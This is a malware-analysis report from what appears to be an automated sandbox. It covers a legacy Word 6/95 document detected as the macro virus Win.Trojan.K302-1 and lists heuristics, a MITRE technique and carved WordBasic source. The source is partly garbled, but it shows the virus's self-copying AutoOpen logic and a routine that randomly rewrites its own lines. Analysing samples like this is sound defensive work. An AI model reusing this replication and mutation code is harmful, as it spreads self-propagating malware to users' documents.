MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as a legacy macro virus by heuristics and ClamAV, specifically Win.Trojan.K302-1. The embedded WordBasic macro code, including functions like 'AutoOpen' and 'k3', suggests an intent to copy and potentially execute malicious routines. The presence of the 'RSN MACRO VIRUS' marker further supports its classification as a macro-based threat.
Heuristics 3
-
ClamAV: Win.Trojan.K302-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.K302-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCEThe Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
wordbasic_macros.txt |
wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 2210 bytes |
SHA-256: 0da7c301aadf99af4d85cda17e0ea8b42fc587e8972f01c1f94bdc00da9619b4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
,
@cmd2862 ,
29541 + , 25971 , + 28019 ,
,
25441
, 25441 , 25441 3436
,
main
i = 1
@cmd80b7 1 = 0 whcp = 3
@cmd80b7 1 0 whcp = 1
@cmd8111 0
d$ = @cmd8005 77
b$ = @cmd8025 = @cmd8005 58
c$ = @cmd8005 67
i = 1 a$ = @cmd80be d$
i = 1 @cmd00d7 = c$ , , = 1
@cmd8012 a$
i = 1 @cmd809f 1
i = 1 c @cmd0562 b$ , whcp
* L
@cmd00d7 = c$ , , = 1
main
REM sub k3(fnm$,wh)
REM f1$ = "AutoOpen"
29551
REM f3$ = "m" : p$ = Chr$(13)
REM if wh=3 then
REM MacroCopy f1$, fnm$ + f1$
, +
REM MacroCopy f3$, fnm$ + f3$
REM else
REM MacroCopy fnm$ + f1$,f1$
+ ,
REM MacroCopy fnm$ + f3$,f3$
REM end if
REM macupd(wh)
REM docclose 2
REM End Sub
REM Function rnum(nst, nend)
REM rnum = Int(Rnd() * ((nend + 1) - nst) + nst)
REM End Function
REM Sub macupd(dest)
REM screenupdating 0
REM Dim m1all$(20)
REM Dim m1to4$(10)
REM m1all$(1) = "i = 1"
REM m1all$(2) = "c$ = Chr$(67)"
REM m1all$(3) = "b$ = FileName$() + chr$(58)"
REM m1all$(4) = "ScreenUpdating 0"
REM m1all$(5) = "If CountMacros(1) = 0 Then whcp = 3"
REM m1all$(6) = "If CountMacros(1) > 0 Then whcp = 1"
REM m1all$(7) = " d$ = Chr$(77) "
REM cnt = 7
REM m1all$(11) = " a$ = MacroDesc$(d$)"
REM m1all$(12) = " ToolsMacro .Name = c$, .Edit, .Show = 1 "
REM m1all$(13) = "Insert a$"
REM m1all$(14) = "DocClose 1"
REM m1all$(15) = "c.gb(b$, whcp)"
REM m1all$(16) = "ToolsMacro .Name = c$, .Delete, .Show = 1 "
REM For i = 1 To cnt
REM lab1:
REM k = rnum(1, cnt)
REM If m1to4$(k) <> "" Then
REM Goto lab1
REM Else
REM m1to4$(k) = m1all$(i)
REM End If
REM Next i
REM For i = 1 To cnt
REM a$ = a$ + m1to4$(i) + Chr$(13)
REM Next i
REM For i = 11 To 16
REM selcrit = rnum(1, 4)
REM Select Case selcrit
REM Case 2
REM asel$ = "if i=1 then "
REM Case 3
REM asel$ = "if i>0 then "
REM Case 4
REM asel$ = "goto " + Chr$(60 + i) + ":" + Chr$(13) + Chr$(60 '+ i) + ":" + Chr$(13)
REM Case Else
REM asel$ = ""
REM End Select
REM a$ = a$ + asel$ + m1all$(i) + Chr$(13)
REM Next i
REM ToolsMacro .Name = "m", .Show = dest, .Edit
REM editselectall
REM editcut
REM Insert "sub main"+ Chr$(13)+a$+"end sub"
REM docclose 1
REM End Sub
MAIN
m
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.